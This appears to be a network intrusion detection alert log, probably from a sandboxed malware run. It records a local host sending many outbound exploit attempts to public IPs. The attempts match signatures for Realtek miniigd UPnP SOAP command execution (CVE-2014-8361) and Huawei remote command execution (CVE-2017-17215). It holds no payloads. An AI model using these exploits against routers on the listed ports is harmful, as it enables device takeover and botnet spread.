                                                07/20/24-23:05:57.139895TCP2025132ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-83613310452869192.168.2.14115.67.18.16
                                                07/20/24-23:05:40.322260TCP2831300ETPRO EXPLOIT Realtek SDK Miniigd UPnP SOAP RCE M23969452869192.168.2.14122.165.176.151
                                                07/20/24-23:06:12.687393TCP2027339ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound4209052869192.168.2.14201.80.203.210
                                                07/20/24-23:06:01.293209TCP2027339ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound5350652869192.168.2.14124.138.24.130
                                                07/20/24-23:05:46.014684TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5941637215192.168.2.1443.38.221.79
                                                07/20/24-23:05:56.106041TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)3485237215192.168.2.14157.234.135.232
                                                07/20/24-23:05:58.262276TCP2027339ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound4805252869192.168.2.14152.47.45.245
                                                07/20/24-23:05:52.493434TCP2027339ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound4503452869192.168.2.14222.41.152.79
                                                07/20/24-23:05:57.017538TCP2831300ETPRO EXPLOIT Realtek SDK Miniigd UPnP SOAP RCE M24126452869192.168.2.14101.18.135.140
                                                07/20/24-23:06:30.714690TCP2831300ETPRO EXPLOIT Realtek SDK Miniigd UPnP SOAP RCE M23435652869192.168.2.14113.244.48.233
                                                07/20/24-23:05:46.070077TCP2027339ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound5480252869192.168.2.14147.148.71.168
                                                07/20/24-23:05:58.104584TCP2025132ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-83614108852869192.168.2.14122.54.20.32
                                                07/20/24-23:06:01.480449TCP2025132ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-83615166452869192.168.2.14138.239.248.75
                                                07/20/24-23:05:56.402930TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)3513237215192.168.2.14197.128.209.25
                                                07/20/24-23:05:42.135703TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4049637215192.168.2.142.201.243.3
                                                07/20/24-23:05:37.593936TCP2831300ETPRO EXPLOIT Realtek SDK Miniigd UPnP SOAP RCE M25581252869192.168.2.1441.152.208.190
                                                07/20/24-23:05:52.589589TCP2831300ETPRO EXPLOIT Realtek SDK Miniigd UPnP SOAP RCE M24246652869192.168.2.1451.78.128.224
                                                07/20/24-23:06:02.025297TCP2025132ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-83615640852869192.168.2.14118.217.130.214
                                                07/20/24-23:06:07.230869TCP2027339ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound5913452869192.168.2.14165.137.205.188
                                                07/20/24-23:06:07.283476TCP2027339ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound5519652869192.168.2.1484.52.21.90
                                                07/20/24-23:05:38.953817TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4134037215192.168.2.14173.8.173.13
                                                07/20/24-23:05:48.773442TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)3936037215192.168.2.1441.40.7.30
                                                07/20/24-23:05:59.994984TCP2027339ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound4933452869192.168.2.14188.68.33.45
                                                07/20/24-23:06:04.571848TCP2831300ETPRO EXPLOIT Realtek SDK Miniigd UPnP SOAP RCE M25491452869192.168.2.1417.240.156.181
                                                07/20/24-23:05:57.034294TCP2027339ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound5662452869192.168.2.14155.244.161.196
                                                07/20/24-23:05:40.471777TCP2831300ETPRO EXPLOIT Realtek SDK Miniigd UPnP SOAP RCE M25203452869192.168.2.1417.102.178.46
                                                07/20/24-23:05:46.459249TCP2027339ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound3952652869192.168.2.14138.44.159.137
                                                07/20/24-23:05:36.338927TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5438637215192.168.2.1441.253.179.250
                                                07/20/24-23:05:40.395251TCP2027339ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound5652452869192.168.2.14106.223.167.59
                                                07/20/24-23:06:00.147952TCP2027339ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound5819452869192.168.2.1414.217.3.16
                                                07/20/24-23:06:03.784686TCP2025132ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-83614381452869192.168.2.1485.78.98.108
                                                07/20/24-23:06:11.469685TCP2831300ETPRO EXPLOIT Realtek SDK Miniigd UPnP SOAP RCE M25486652869192.168.2.14179.38.138.95
                                                07/20/24-23:06:18.420371TCP2027339ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound5875452869192.168.2.14111.50.3.252
                                                07/20/24-23:06:10.116912TCP2027339ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound5117652869192.168.2.1491.181.24.50
                                                07/20/24-23:05:56.325754TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5413637215192.168.2.14197.101.153.117
                                                07/20/24-23:06:07.419849TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4038637215192.168.2.14130.96.49.178
                                                07/20/24-23:05:42.188277TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5472637215192.168.2.14108.79.130.56
                                                07/20/24-23:06:00.486746TCP2027339ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound4642652869192.168.2.14147.98.124.138
                                                07/20/24-23:06:32.091191TCP2027339ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound5428452869192.168.2.14167.161.102.62
                                                07/20/24-23:05:35.547888TCP2025132ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-83615605652869192.168.2.1451.156.162.59
                                                07/20/24-23:06:00.198211TCP2027339ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound3851852869192.168.2.14197.21.16.30
                                                07/20/24-23:05:37.449942TCP2027339ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound5854652869192.168.2.1472.58.64.100
                                                07/20/24-23:06:13.097390TCP2025132ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-83615442052869192.168.2.14205.249.112.164
                                                07/20/24-23:06:32.610183TCP2027339ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound3757652869192.168.2.14221.140.145.154
                                                07/20/24-23:06:02.577230TCP2025132ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-83614195652869192.168.2.1419.179.160.126
                                                07/20/24-23:05:57.111519TCP2831300ETPRO EXPLOIT Realtek SDK Miniigd UPnP SOAP RCE M23904652869192.168.2.14203.90.117.81
                                                07/20/24-23:05:57.804757TCP2025132ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-83613698452869192.168.2.14210.180.35.0
                                                07/20/24-23:05:40.347577TCP2027339ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound5769052869192.168.2.1424.106.113.180
                                                07/20/24-23:06:33.839791TCP2025132ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-83614729852869192.168.2.14132.28.34.172
                                                07/20/24-23:05:37.468386TCP2027339ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound4649052869192.168.2.14134.226.59.80
                                                07/20/24-23:05:47.108564TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5314837215192.168.2.1441.146.0.186
                                                07/20/24-23:05:52.557906TCP2027339ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound4425052869192.168.2.14139.219.69.26
                                                07/20/24-23:05:39.765891TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5942237215192.168.2.14157.58.228.27
                                                07/20/24-23:05:57.791970TCP2027339ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound3299652869192.168.2.14189.213.60.124
                                                07/20/24-23:05:58.860933TCP2025132ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-83614773052869192.168.2.14163.92.171.162
                                                07/20/24-23:05:33.859779TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)3585637215192.168.2.14197.219.134.66
                                                07/20/24-23:06:01.368197TCP2831300ETPRO EXPLOIT Realtek SDK Miniigd UPnP SOAP RCE M25882652869192.168.2.1452.242.228.39
                                                07/20/24-23:05:58.394422TCP2025132ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-83614753852869192.168.2.1468.139.170.193
                                                07/20/24-23:05:50.557201TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5208837215192.168.2.14197.22.67.97
                                                07/20/24-23:05:42.238265TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)3998637215192.168.2.14157.19.177.243
                                                07/20/24-23:06:19.586892TCP2831300ETPRO EXPLOIT Realtek SDK Miniigd UPnP SOAP RCE M25402452869192.168.2.1423.110.47.132
                                                07/20/24-23:06:03.387430TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)3323837215192.168.2.1441.128.172.37
                                                07/20/24-23:06:01.176055TCP2027339ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound4569252869192.168.2.14103.249.11.195
                                                07/20/24-23:06:02.212762TCP2831300ETPRO EXPLOIT Realtek SDK Miniigd UPnP SOAP RCE M25604252869192.168.2.14194.102.249.55
                                                07/20/24-23:05:57.551205TCP2831300ETPRO EXPLOIT Realtek SDK Miniigd UPnP SOAP RCE M23538452869192.168.2.1485.8.43.114
                                                07/20/24-23:05:38.404197TCP2027339ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound3678652869192.168.2.14213.189.106.94
                                                07/20/24-23:05:48.763323TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)3390837215192.168.2.1441.82.160.190
                                                07/20/24-23:06:14.126981TCP2027339ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound4182852869192.168.2.1449.216.129.181
                                                07/20/24-23:05:52.537891TCP2831300ETPRO EXPLOIT Realtek SDK Miniigd UPnP SOAP RCE M24908852869192.168.2.1473.41.138.160
                                                07/20/24-23:05:59.139794TCP2027339ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound3865252869192.168.2.14159.0.2.81
                                                07/20/24-23:06:00.781631TCP2831300ETPRO EXPLOIT Realtek SDK Miniigd UPnP SOAP RCE M25532252869192.168.2.1494.62.92.125
                                                07/20/24-23:06:39.662031TCP2831300ETPRO EXPLOIT Realtek SDK Miniigd UPnP SOAP RCE M24990652869192.168.2.14106.217.170.66
                                                07/20/24-23:05:45.680095TCP2027339ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound5868452869192.168.2.14182.254.22.233
                                                07/20/24-23:05:45.414465TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4654037215192.168.2.14220.31.133.12
                                                07/20/24-23:05:39.602106TCP2027339ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound3899852869192.168.2.14219.185.28.245
                                                07/20/24-23:05:36.343227TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4339437215192.168.2.1474.110.183.41
                                                07/20/24-23:06:14.162873TCP2025132ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-83613744452869192.168.2.1466.35.203.54
                                                07/20/24-23:06:06.796614TCP2027339ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound4926852869192.168.2.1435.138.240.228
                                                07/20/24-23:05:50.531553TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5078037215192.168.2.14157.206.135.181
                                                07/20/24-23:05:37.601961TCP2027339ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound4855452869192.168.2.14168.99.192.8
                                                07/20/24-23:05:59.589626TCP2027339ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound3570452869192.168.2.14134.186.183.71
                                                07/20/24-23:05:59.827264TCP2027339ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound4134452869192.168.2.14169.222.175.35
                                                07/20/24-23:05:57.457796TCP2025132ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-83614575052869192.168.2.148.51.102.139
                                                07/20/24-23:05:59.809385TCP2831300ETPRO EXPLOIT Realtek SDK Miniigd UPnP SOAP RCE M25195852869192.168.2.1482.229.75.23
                                                07/20/24-23:05:45.798059TCP2025132ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-83614356252869192.168.2.1493.192.213.30
                                                07/20/24-23:06:13.391443TCP2025132ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-83614975252869192.168.2.14209.58.115.60
                                                07/20/24-23:05:36.052390TCP2025132ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-83613423652869192.168.2.1459.135.63.153
                                                07/20/24-23:05:39.067591TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)6043837215192.168.2.14197.163.50.43
                                                07/20/24-23:05:40.365973TCP2831300ETPRO EXPLOIT Realtek SDK Miniigd UPnP SOAP RCE M23840452869192.168.2.1473.48.25.59
                                                07/20/24-23:06:25.711626TCP2831300ETPRO EXPLOIT Realtek SDK Miniigd UPnP SOAP RCE M24254652869192.168.2.1476.0.97.189
                                                07/20/24-23:05:57.024016TCP2027339ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound3607852869192.168.2.14168.222.92.221
                                                07/20/24-23:05:59.236975TCP2025132ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-83615439052869192.168.2.14181.187.190.81
                                                07/20/24-23:06:06.490951TCP2025132ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-83615428852869192.168.2.1418.128.175.69
                                                07/20/24-23:05:58.006516TCP2027339ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound5107452869192.168.2.1443.137.138.121
                                                07/20/24-23:05:59.400253TCP2027339ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound4772452869192.168.2.1439.191.83.40
                                                07/20/24-23:05:52.539655TCP2027339ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound4574052869192.168.2.14156.53.15.210
                                                07/20/24-23:05:59.273796TCP2027339ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound5573852869192.168.2.14101.243.190.245
                                                07/20/24-23:06:05.219605TCP2027339ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound5356252869192.168.2.1412.149.118.225
                                                07/20/24-23:05:37.449834TCP2027339ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound3497852869192.168.2.14207.28.189.232
                                                07/20/24-23:06:01.862638TCP2027339ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound3818452869192.168.2.1476.195.229.149
                                                07/20/24-23:05:40.461168TCP2027339ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound5409852869192.168.2.1487.103.117.210
                                                07/20/24-23:05:57.017538TCP2027339ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound4693252869192.168.2.14175.105.64.16
                                                07/20/24-23:06:01.472267TCP2831300ETPRO EXPLOIT Realtek SDK Miniigd UPnP SOAP RCE M25554852869192.168.2.14212.222.225.7
                                                07/20/24-23:05:34.622534TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4924437215192.168.2.1441.42.206.73
                                                07/20/24-23:06:15.893376TCP2025132ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-83615507252869192.168.2.1414.251.169.202
                                                07/20/24-23:05:35.264109TCP2025132ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-83614901252869192.168.2.14101.86.111.6
                                                07/20/24-23:05:45.764775TCP2027339ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound5126052869192.168.2.1438.95.213.57
                                                07/20/24-23:05:57.549013TCP2025132ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-83613288652869192.168.2.14165.198.98.63
                                                07/20/24-23:06:01.556801TCP2027339ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound4574252869192.168.2.14166.28.205.27
                                                07/20/24-23:06:09.697115TCP2025132ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-83613641652869192.168.2.1495.88.21.30
                                                07/20/24-23:06:22.140723TCP2027339ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound3392652869192.168.2.14196.52.240.32
                                                07/20/24-23:05:42.136712TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)3310437215192.168.2.14197.92.162.105
                                                07/20/24-23:05:57.437168TCP2027339ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound3545652869192.168.2.14165.228.62.149
                                                07/20/24-23:05:56.137269TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)3445237215192.168.2.14197.104.32.150
                                                07/20/24-23:05:37.476343TCP2831300ETPRO EXPLOIT Realtek SDK Miniigd UPnP SOAP RCE M25751652869192.168.2.1451.156.162.59
                                                07/20/24-23:05:48.805828TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)3881437215192.168.2.14157.29.74.228
                                                07/20/24-23:05:39.518664TCP2027339ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound4392252869192.168.2.1440.98.198.13
                                                07/20/24-23:06:00.067283TCP2027339ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound5114452869192.168.2.14161.128.195.195
                                                07/20/24-23:05:59.119988TCP2025132ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-83615448652869192.168.2.14213.153.92.60
                                                07/20/24-23:05:35.345455TCP2027339ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound4319452869192.168.2.14142.219.250.29
                                                07/20/24-23:06:11.221707TCP2027339ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound5974852869192.168.2.1465.1.182.111
                                                07/20/24-23:05:47.997851TCP2025132ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-83613789652869192.168.2.14176.236.240.152
                                                07/20/24-23:05:57.200464TCP2027339ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound5464652869192.168.2.14140.182.198.151
                                                07/20/24-23:05:52.575727TCP2831300ETPRO EXPLOIT Realtek SDK Miniigd UPnP SOAP RCE M25738852869192.168.2.14149.122.202.24
                                                07/20/24-23:06:17.447614TCP2027339ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound4230652869192.168.2.14150.31.127.80
                                                07/20/24-23:05:58.818180TCP2027339ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound3770452869192.168.2.14119.34.14.186
                                                07/20/24-23:05:37.496382TCP2027339ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound4469052869192.168.2.1465.155.38.231
                                                07/20/24-23:06:03.378832TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4703837215192.168.2.1441.130.22.42
                                                07/20/24-23:05:57.001261TCP2027339ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound5299252869192.168.2.14213.67.142.255
                                                07/20/24-23:05:57.062143TCP2027339ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound3548052869192.168.2.14150.121.194.2
                                                07/20/24-23:05:39.039093TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4386237215192.168.2.14197.45.71.107
                                                07/20/24-23:05:40.377377TCP2027339ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound3780852869192.168.2.1454.192.129.153
                                                07/20/24-23:06:00.954678TCP2025132ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-83614752652869192.168.2.14112.235.16.243
                                                07/20/24-23:06:01.285913TCP2025132ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-83613932652869192.168.2.1493.254.0.231
                                                07/20/24-23:05:57.024016TCP2025132ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-83613461052869192.168.2.14153.114.31.182
                                                07/20/24-23:05:59.119988TCP2831300ETPRO EXPLOIT Realtek SDK Miniigd UPnP SOAP RCE M23647052869192.168.2.141.71.203.54
                                                07/20/24-23:06:06.144517TCP2027339ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound5632052869192.168.2.1449.154.69.61
                                                07/20/24-23:06:15.435068TCP2025132ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-83613412052869192.168.2.14115.150.215.241
                                                07/20/24-23:05:36.279109TCP2025132ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-83615306052869192.168.2.14134.144.46.130
                                                07/20/24-23:05:36.325898TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4029237215192.168.2.14197.131.149.155
                                                07/20/24-23:05:37.445004TCP2027339ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound4425052869192.168.2.1419.45.76.169
                                                07/20/24-23:05:39.193478TCP2025132ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-83615723452869192.168.2.14163.182.5.64
                                                07/20/24-23:05:36.324298TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)3744037215192.168.2.14134.116.59.179
                                                07/20/24-23:05:40.471609TCP2027339ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound5021452869192.168.2.14183.253.82.115
                                                07/20/24-23:06:01.468942TCP2831300ETPRO EXPLOIT Realtek SDK Miniigd UPnP SOAP RCE M25319452869192.168.2.1472.144.78.222
                                                07/20/24-23:05:58.253380TCP2027339ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound5875452869192.168.2.1463.83.58.182
                                                07/20/24-23:05:59.404139TCP2025132ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-83615607052869192.168.2.14192.95.119.34
                                                07/20/24-23:05:37.449942TCP2027339ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound4427452869192.168.2.1480.130.32.22
                                                07/20/24-23:05:50.513568TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4261837215192.168.2.1441.42.120.251
                                                07/20/24-23:05:59.827265TCP2025132ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-83615554052869192.168.2.14135.195.82.21
                                                07/20/24-23:05:35.313345TCP2025132ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-83614451052869192.168.2.1483.71.51.102
                                                07/20/24-23:05:57.518359TCP2027339ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound5553052869192.168.2.14175.103.230.10
                                                07/20/24-23:05:36.324397TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4655637215192.168.2.1441.243.247.233
                                                07/20/24-23:05:48.876892TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5738237215192.168.2.14157.79.132.9
                                                07/20/24-23:06:53.015066TCP2027339ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound4298052869192.168.2.1450.153.196.242
                                                07/20/24-23:05:56.998513TCP2027339ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound3409252869192.168.2.14182.142.59.96
                                                07/20/24-23:06:01.225562TCP2025132ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-83615765452869192.168.2.14130.0.101.52
                                                07/20/24-23:05:56.048573TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4674837215192.168.2.14197.93.69.105
                                                07/20/24-23:06:00.459661TCP2025132ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-83614811252869192.168.2.1466.1.85.90
                                                07/20/24-23:06:17.699827TCP2025132ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-83616081652869192.168.2.1434.68.31.177
                                                07/20/24-23:05:35.778623TCP2027339ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound5061052869192.168.2.1468.10.183.207
                                                07/20/24-23:05:39.773172TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4005037215192.168.2.145.204.127.74
                                                07/20/24-23:05:57.158457TCP2025132ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-83614667652869192.168.2.1414.220.33.65
                                                07/20/24-23:07:06.283235TCP2025132ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-83613967852869192.168.2.14216.150.218.132
                                                07/20/24-23:05:52.508652TCP2027339ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound4098052869192.168.2.1475.169.253.25
                                                07/20/24-23:05:57.013302TCP2027339ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound4752652869192.168.2.1492.115.168.51
                                                07/20/24-23:05:38.003073TCP2025132ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-83614985452869192.168.2.1477.83.231.0
                                                07/20/24-23:06:06.906932TCP2831300ETPRO EXPLOIT Realtek SDK Miniigd UPnP SOAP RCE M25135052869192.168.2.144.205.10.72
                                                07/20/24-23:06:07.055543TCP2027339ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound5952052869192.168.2.1465.1.182.111
                                                07/20/24-23:05:38.631980TCP2027339ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound4892652869192.168.2.14183.253.82.115
                                                07/20/24-23:06:00.444049TCP2831300ETPRO EXPLOIT Realtek SDK Miniigd UPnP SOAP RCE M23427852869192.168.2.14186.25.143.158
                                                07/20/24-23:05:48.756259TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5910437215192.168.2.14197.170.188.98
                                                07/20/24-23:05:45.169432TCP2027339ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound4082452869192.168.2.1460.123.7.240
                                                07/20/24-23:05:56.998513TCP2027339ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound5558452869192.168.2.1465.123.169.88
                                                07/20/24-23:06:00.187277TCP2027339ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound3661052869192.168.2.1413.13.248.159
                                                07/20/24-23:05:47.327962TCP2025132ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-83614774852869192.168.2.14220.104.129.24
